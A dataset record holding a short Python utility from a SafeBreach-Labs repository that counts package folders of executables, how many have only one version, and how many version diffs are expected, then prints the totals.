] | null | null | null | utilities/calculate_missing_diffs.py | SafeBreach-Labs/Back2TheFuture | 39b5eaf289e694aa9cae1bd26fd1f35b0d4dd0c3 | [
"BSD-3-Clause"
] | 13 | 2021-08-07T15:53:08.000Z | 2022-02-02T14:23:06.000Z | # (CWD: executables/amd64 folder)
# TODO: finish this
import os
packages = []
total_executables_packages = len(os.listdir("."))
for package_name in os.listdir("."):
packages.append(os.path.join(".", package_name))
without_diffs = []
expected_diffs = 0
for package_path in packages:
match_found = os.listdir(package_path)
if len(match_found) >= 2:
expected_diffs += len(match_found) - 1
continue
without_diffs.append(package_path)
print("total amount of packages: {}".format(total_executables_packages))
print("total packages with only 1 version: {}".format(len(without_diffs)))
print("total amount of expected diffs: {}".format(expected_diffs)) | 37.555556 | 74 | 0.724852 | 91 | 676 | 5.186813 | 0.406593 | 0.110169 | 0.101695 | 0.076271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010327 | 0.140533 | 676 | 18 | 75 | 37.555556 | 0.802065 | 0.072485 | 0 | 0 | 0 | 0 | 0.1648 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.